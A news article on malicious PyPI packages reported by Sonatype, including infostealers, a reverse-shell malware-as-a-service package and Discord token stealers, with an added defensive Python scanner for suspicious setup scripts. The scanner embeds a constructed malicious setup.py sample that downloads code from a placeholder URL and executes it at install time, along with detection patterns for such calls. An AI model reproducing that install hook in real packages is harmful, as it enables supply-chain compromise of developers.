Security vendor Sonatype detected 6,933 malicious open source packages in March alone, bringing the total number detected since 2019 to 115,165.
Quite a few of these malicious components were infostealers, including imitations of the popular W4SP stealer, such as “microsoft-helper” by its self-proclaimed author “idklmao”.
“The name of the package, microsoft-helper, suggests a malicious person may be trying to disguise its malice, possibly adding it as a dependency to a popular package that they already own,” Sonatype explained.
“But the author’s name, composed of abbreviations, did not even pretend to be that of the correct author.”
The malicious package contains a second-stage payload, which Sonatype says allows for more flexibility in the attack, since the attacker can modify the code more easily without having to start from scratch.
For more information on open source supply chain risks, see Researchers Uncover 700+ Malicious Open Source Packages.
Unlike “microsoft-helper”, the authors of the “reverse-shell” package, which Sonatype discovered last month, made no attempt to hide their intentions.
It was offered as malware-as-a-service (MaaS) for the Spanish market and hosted its malicious files on GitHub.
“The package ‘reverse-shell’ doesn’t look malicious at first glance, but the file it executes from GitHub, ‘bypass.py’, and the resulting ‘WindowsDefender.py’ are nothing less than malicious,” Bender explained.
“By hosting malicious files in public repositories, bad actors have more control over the files, which allows them to remove, upgrade, or even version control their payloads.”
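The pattern described above (a package whose install or import logic fetches a second-stage file from a public repository and executes it) is something a defender can screen for before a dependency is installed. The following is an added example, not code from the article or from Sonatype: it parses a setup script with Python's `ast` module and flags the combination of a network fetch, a dynamic `exec`/`eval`/subprocess call and a setuptools install hook. The two setup scripts embedded in it are constructed stand-ins, and the URL in the suspicious one is a placeholder, not the package's real hosting location.

```python
import ast
import re

# Constructed sample: a setup.py of the shape described in the article, with an
# install hook that pulls a second-stage file from a public repository and runs it.
# The URL is a placeholder; this is not the real "reverse-shell" package.
SUSPICIOUS_SETUP = '''
import urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        code = urllib.request.urlopen("https://raw.githubusercontent.com/EXAMPLE-PLACEHOLDER/repo/main/bypass.py").read()
        exec(code)

setup(name="example-pkg", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample: an ordinary setup.py with no install-time behaviour.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="example-pkg", version="0.1", packages=["example_pkg"])
'''

# Call names that reach the network; extend to match your own allow/deny list.
FETCH_CALLS = ("urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get", "requests.post")
# Call names that turn data into executing code.
EXEC_NAMES = ("exec", "eval", "compile")
# setuptools command classes that run code during pip install.
INSTALL_BASES = ("install", "develop", "egg_info", "build_py")


def dotted_name(node):
    """Return 'a.b.c' for an Attribute/Name chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def audit_setup_source(source):
    """Statically inspect a setup script and report install-time risk indicators."""
    tree = ast.parse(source)
    findings = {"remote_fetch": [], "dynamic_exec": [], "install_hook": [], "raw_urls": []}

    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name is None:
                continue
            if name in FETCH_CALLS or name.endswith(".urlopen"):
                findings["remote_fetch"].append(name)
            if name in EXEC_NAMES or name.startswith(("subprocess.", "os.system", "os.popen")):
                findings["dynamic_exec"].append(name)
            # A cmdclass override is how setup.py attaches code to `pip install`.
            if name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings["install_hook"].append("cmdclass")
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = dotted_name(base) or ""
                if base_name.split(".")[-1] in INSTALL_BASES:
                    findings["install_hook"].append(node.name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if re.match(r"https?://", node.value):
                findings["raw_urls"].append(node.value)

    # Fetching code from the network and executing it is the combination worth a human review;
    # either signal alone (e.g. a benign download helper) is only informational.
    findings["verdict"] = "REVIEW" if findings["remote_fetch"] and findings["dynamic_exec"] else "OK"
    return findings


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        result = audit_setup_source(src)
        print(label, result["verdict"], {k: v for k, v in result.items() if k != "verdict"})
```

The check is deliberately conservative: it does not try to decide whether the downloaded file is malicious, only that the package would fetch and run code it does not ship with, which is exactly the property that lets an attacker swap or version the payload after publication. Obfuscated packages like the Discord token stealers mentioned further down defeat a simple name match, so in practice this belongs alongside an allow-list of known dependencies rather than replacing one.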
Finally, Sonatype highlighted two highly obfuscated packages, ‘proxier-api’ and ‘nitro-api66’, designed to steal Discord tokens.
All of the above were found in the Python Package Index (PyPI) repository.
“These types of packages are cause for concern because they pose a serious threat to developers who might inadvertently download and install them,” the vendor argued, adding that it had reported them to the PyPI team, who removed them quickly and skillfully.